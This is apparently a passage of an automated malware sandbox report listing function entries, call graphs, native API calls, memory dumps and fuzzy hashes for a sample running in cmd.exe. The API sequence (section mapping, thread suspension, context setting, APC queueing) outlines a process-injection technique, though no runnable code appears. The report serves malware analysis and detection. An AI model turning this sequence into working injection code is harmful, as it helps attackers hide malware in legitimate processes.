119715->119716 119717 2f6cfba 119716->119717 119717->119705 119719 2f7af20 LdrLoadDll 119718->119719 119720 2f7a1fc 119719->119720 119726 3c12ca0 LdrInitializeThunk 119720->119726 119721 2f6cf7f 119721->119711 119723 2f7a7d0 119721->119723 119724 2f7af20 LdrLoadDll 119723->119724 119725 2f7a7ef 119724->119725 119725->119715 119726->119721 119728 2f7af20 LdrLoadDll 119727->119728 119729 2f79e6c 119728->119729 119732 3c12dd0 LdrInitializeThunk 119729->119732 119730 2f6f69e 119730->119584 119732->119730 119733 3abcb84 119736 3aba042 119733->119736 119735 3abcba5 119738 3aba06b 119736->119738 119737 3aba56c 119737->119735 119738->119737 119739 3aba182 NtQueryInformationProcess 119738->119739 119741 3aba1ba 119739->119741 119740 3aba1ef 119740->119735 119741->119740 119742 3aba2db 119741->119742 119743 3aba290 119741->119743 119744 3aba2fc NtSuspendThread 119742->119744 119765 3ab9de2 NtCreateSection NtMapViewOfSection NtClose 119743->119765 119745 3aba30d 119744->119745 119748 3aba331 119744->119748 119745->119735 119747 3aba2cf 119747->119735 119750 3aba412 119748->119750 119756 3ab9bb2 119748->119756 119751 3aba531 119750->119751 119753 3aba4a6 NtSetContextThread 119750->119753 119752 3aba552 NtResumeThread 119751->119752 119752->119737 119755 3aba4bd 119753->119755 119754 3aba51c NtQueueApcThread 119754->119751 119755->119751 119755->119754 119757 3ab9bf7 119756->119757 119758 3ab9c66 NtCreateSection 119757->119758 119759 3ab9d4e 119758->119759 119760 3ab9ca0 119758->119760 119759->119750 119761 3ab9cc1 NtMapViewOfSection 119760->119761 119761->119759 119762 3ab9d0c 119761->119762 119762->119759 119763 3ab9d88 119762->119763 119764 3ab9dc5 NtClose 119763->119764 119764->119750 119765->119747

                                                                                                                                            Executed Functions

                                                                                                                                            Function 03ABA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 03ABA19F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                            • Instruction ID: 53b793412491884f403311bbf466bef74ec382bc0ef6bbcd8b420a040e69db98
                                                                                                                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                            • Instruction Fuzzy Hash: 10F13F74518A8C8FDBA9EF68C894AEEB7F4FB98304F40462ED44ADB251DF349641CB41
                                                                                                                                            Function 03AB9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 207 3ab9baf-3ab9bfe call 3ab9102 210 3ab9c0c-3ab9c9a call 3abb942 * 2 NtCreateSection 207->210 211 3ab9c00 207->211 217 3ab9d5a-3ab9d68 210->217 218 3ab9ca0-3ab9d0a call 3abb942 NtMapViewOfSection 210->218 212 3ab9c02-3ab9c0a 211->212 212->210 212->212 221 3ab9d0c-3ab9d4c 218->221 222 3ab9d52 218->222 224 3ab9d69-3ab9d6b 221->224 225 3ab9d4e-3ab9d4f 221->225 222->217 226 3ab9d88-3ab9ddc call 3abcd62 NtClose 224->226 227 3ab9d6d-3ab9d72 224->227 225->222 229 3ab9d74-3ab9d86 call 3ab9172 227->229 229->226
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Section$CloseCreateView
                                                                                                                                            • String ID: @$@
                                                                                                                                            • API String ID: 1133238012-149943524
                                                                                                                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                            • Instruction ID: 241f4d8fbf61aee44c3b3e9963fcd366de59719a002ac1f6be6d9db045c6fcf8
                                                                                                                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                            • Instruction Fuzzy Hash: F6616E70618B488FCB58EF68D8856EABBF4FB98314F50062EE58AC3651DB35D441CB86
                                                                                                                                            Function 03AB9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 266 3ab9bb2-3ab9bef 267 3ab9bf7-3ab9bfe 266->267 268 3ab9bf2 call 3ab9102 266->268 269 3ab9c0c-3ab9c9a call 3abb942 * 2 NtCreateSection 267->269 270 3ab9c00 267->270 268->267 276 3ab9d5a-3ab9d68 269->276 277 3ab9ca0-3ab9d0a call 3abb942 NtMapViewOfSection 269->277 271 3ab9c02-3ab9c0a 270->271 271->269 271->271 280 3ab9d0c-3ab9d4c 277->280 281 3ab9d52 277->281 283 3ab9d69-3ab9d6b 280->283 284 3ab9d4e-3ab9d4f 280->284 281->276 285 3ab9d88-3ab9ddc call 3abcd62 NtClose 283->285 286 3ab9d6d-3ab9d72 283->286 284->281 288 3ab9d74-3ab9d86 call 3ab9172 286->288 288->285
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Section$CreateView
                                                                                                                                            • String ID: @$@
                                                                                                                                            • API String ID: 1585966358-149943524
                                                                                                                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                            • Instruction ID: 46642c5447d655e6195366e0fbb53d0ed7fd7c8206d1e65eb77363796bbc09e0
                                                                                                                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                            • Instruction Fuzzy Hash: 6B517E70618B088FD758DF18D8956AABBF4FB88314F50062EE98AC3651DF35D441CB86
                                                                                                                                            Function 03ABA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 03ABA19F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                            • Instruction ID: 1dba94c0735b586130cd7e9156a09a3eb9a88d95c1612663bc0313f8001e4567
                                                                                                                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                            • Instruction Fuzzy Hash: 6E514C70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7211DF309645CB41
                                                                                                                                            Function 02F7A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 565 2f7a320-2f7a371 call 2f7af20 NtCreateFile
                                                                                                                                            APIs
                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02F74BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F74BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02F7A36D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: .z`
                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                            • Instruction ID: 01ed48b7a1d6a1a8c354ecac814d5f4554c47e8942a6c2a1874da4281205dd9b
                                                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                            • Instruction Fuzzy Hash: 42F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4
                                                                                                                                            Function 02F7A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtReadFile.NTDLL(02F74D62,5EB65239,FFFFFFFF,02F74A21,?,?,02F74D62,?,02F74A21,FFFFFFFF,5EB65239,02F74D62,?,00000000), ref: 02F7A415
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                            • Instruction ID: bb5b60ff12b9257a639f0f3d8607a657f5a76975d93cdcc1cd006f1a61d5670f
                                                                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                            • Instruction Fuzzy Hash: 6BF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158249BA1D97245D630E8118BA0
                                                                                                                                            Function 02F7A44B Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(02F74D40,?,?,02F74D40,00000000,FFFFFFFF), ref: 02F7A475
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
                                                                                                                                            • Instruction ID: 22500948ff0081af7a292d9430fe9ac833e4938227c0e71a4c8692dabbf283d6
                                                                                                                                            • Opcode Fuzzy Hash: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
                                                                                                                                            • Instruction Fuzzy Hash: DDE0C272200204AFDB20DFA8DC88FEB7B68EF44350F15455AFA0CDB282C531E6008B90
                                                                                                                                            Function 02F7A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(02F74D40,?,?,02F74D40,00000000,FFFFFFFF), ref: 02F7A475
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                            • Instruction ID: 91460f49f8baa46e3ef6c5693056b22f397efd48facbc77e62221d6d6ffaeee3
                                                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                            • Instruction Fuzzy Hash: B5D01776200214ABD710EB98DC85EEB7BADEF48760F154499BA189B282C530FA008AE0
                                                                                                                                            Function 03C12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: b5b27c8ad920a0403b6005404a35a43aaee1d687aed24dc9d4454503153bb901
                                                                                                                                            • Instruction ID: 359b454a9353f38ae25ad34aed61c81062e41fec2393494803f4118f9b185dae
                                                                                                                                            • Opcode Fuzzy Hash: b5b27c8ad920a0403b6005404a35a43aaee1d687aed24dc9d4454503153bb901
                                                                                                                                            • Instruction Fuzzy Hash: 329002A1202614434106B1584415616440A87E0601B56C021E101C590DCA2589916125
                                                                                                                                            Function 03C12AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 4bf8edbe36cfe1e8ed5e80aac4993eb6ff9a05b7f4ae263cc0c05f7a84d608ed
                                                                                                                                            • Instruction ID: 238087665e8ec9b4b5fc5d0994690008944888ced97b1bcc36d081a7026125b1
                                                                                                                                            • Opcode Fuzzy Hash: 4bf8edbe36cfe1e8ed5e80aac4993eb6ff9a05b7f4ae263cc0c05f7a84d608ed
                                                                                                                                            • Instruction Fuzzy Hash: 2B900475311714430107F55C07055070447C7D5751357C031F101D550CDF31CD715131
                                                                                                                                            Function 03C12FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 76fa670f38bbb51f4e606b5a83996261daab9f643fa2624eca32ba2ad04f98c8
                                                                                                                                            • Instruction ID: e4f46f8431ac797ed12aa611c36b22f755c54b241a0b04c955bb13d55d24f433
                                                                                                                                            • Opcode Fuzzy Hash: 76fa670f38bbb51f4e606b5a83996261daab9f643fa2624eca32ba2ad04f98c8
                                                                                                                                            • Instruction Fuzzy Hash: 21900261211E1482D201B5684C15B07040587D0703F56C115A015C554CCE1589615521
                                                                                                                                            Function 03C12F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2685d7ddf28bc742b35acdd7bc5fc53c19375b329af6e4ec11b80eed3076ce45
                                                                                                                                            • Instruction ID: cd405b4199e8b9aad7615ee9d30f6b2f2c18d31268a500de3887415f30c460fe
                                                                                                                                            • Opcode Fuzzy Hash: 2685d7ddf28bc742b35acdd7bc5fc53c19375b329af6e4ec11b80eed3076ce45
                                                                                                                                            • Instruction Fuzzy Hash: E69002A134161882D101B1584415B060405C7E1701F56C015E106C554D8B19CD526126
                                                                                                                                            Function 03C12EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f58e1d22c504196103be6843a287ff19fe56daefaca0fc4b420da95cae856438
                                                                                                                                            • Instruction ID: f96e1015076d23e1660977fead79d4dd470b565fcc7546bff5150710bda524b1
                                                                                                                                            • Opcode Fuzzy Hash: f58e1d22c504196103be6843a287ff19fe56daefaca0fc4b420da95cae856438
                                                                                                                                            • Instruction Fuzzy Hash: A29002B120161842D141B1584405746040587D0701F56C011A506C554E8B598ED56665
                                                                                                                                            Function 03C12DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 57c3885a1a32c952a289662ed67c2fbfeefa6fb0825dde5650989e41842c0664
                                                                                                                                            • Instruction ID: 872381a1e5a9137f2512db00e460d2482c8ff3431161d46402ae72a1f6069e2a
                                                                                                                                            • Opcode Fuzzy Hash: 57c3885a1a32c952a289662ed67c2fbfeefa6fb0825dde5650989e41842c0664
                                                                                                                                            • Instruction Fuzzy Hash: 64900261242655925546F1584405507440697E0641796C012A141C950C8A269956D621
                                                                                                                                            Function 03C12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f46a299389552f2f855f608c361cf6339d9bc9f42253d8c58ba4831e28a82f0b
                                                                                                                                            • Instruction ID: e8022053ca86a796dc76d73c720824e4b676c2045cc18ced353c5af1fab1c6ec
                                                                                                                                            • Opcode Fuzzy Hash: f46a299389552f2f855f608c361cf6339d9bc9f42253d8c58ba4831e28a82f0b
                                                                                                                                            • Instruction Fuzzy Hash: 5390027120161853D112B1584505707040987D0641F96C412A042C558D9B568A52A121
                                                                                                                                            Function 03C12D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 51b29caaacdd9d30cb751e83867fdf490c81106f4341d83464b2331d47957a45
                                                                                                                                            • Instruction ID: eaa7797777007ad6f48cad5dd302f7db0877ddc290c72952c313afa7d21abca4
                                                                                                                                            • Opcode Fuzzy Hash: 51b29caaacdd9d30cb751e83867fdf490c81106f4341d83464b2331d47957a45
                                                                                                                                            • Instruction Fuzzy Hash: 8290026921361442D181B158540960A040587D1602F96D415A001D558CCE1589695321
                                                                                                                                            Function 03C12CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: d4ad0f372bba6718da78e318b9d436b0b2c0f76749e4899717f8a004aea36bc4
                                                                                                                                            • Instruction ID: bcaa228f5234556105ac13570ea796e6f9f0a1fb62d32c597b797d54de2edf54
                                                                                                                                            • Opcode Fuzzy Hash: d4ad0f372bba6718da78e318b9d436b0b2c0f76749e4899717f8a004aea36bc4
                                                                                                                                            • Instruction Fuzzy Hash: 0F90027120161842D101B5985409646040587E0701F56D011A502C555ECB6589916131
                                                                                                                                            Function 03C12C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: e0fd01cfc3dec3e308ea0821159004c3569da92a894d07726b7d2281039086e0
                                                                                                                                            • Instruction ID: 970d0a6ce902d0efbbc6c8708ed3429807aae58939b513a7a33da6067275ce0f
                                                                                                                                            • Opcode Fuzzy Hash: e0fd01cfc3dec3e308ea0821159004c3569da92a894d07726b7d2281039086e0
                                                                                                                                            • Instruction Fuzzy Hash: D690027120161C82D101B1584405B46040587E0701F56C016A012C654D8B15C9517521
                                                                                                                                            Function 03C12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
